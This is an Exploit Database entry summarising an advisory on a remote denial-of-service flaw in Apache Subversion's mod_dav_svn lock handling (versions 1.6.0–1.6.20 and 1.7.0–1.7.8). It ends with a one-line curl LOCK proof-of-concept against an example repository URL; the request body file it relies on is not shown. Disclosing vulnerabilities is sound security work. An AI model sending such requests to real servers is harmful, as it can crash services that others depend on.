Apache Subversion 1.6.x - 'mod_dav_svn/lock.c' Remote Denial of Service

EDB-ID:

38421


Author:

anonymous

Type:

dos


Platform:

Linux

Date:

2013-04-05


source: https://www.securityfocus.com/bid/58897/info

Apache Subversion is prone to a remote denial-of-service vulnerability.

Attackers can exploit this issue to crash the application, resulting in denial-of-service conditions.

Apache Subversion versions 1.6.0 through 1.6.20 and 1.7.0 through 1.7.8 are vulnerable. 

curl -X LOCK --data-binary @lock_body 'http://www.example.com/repo/foo'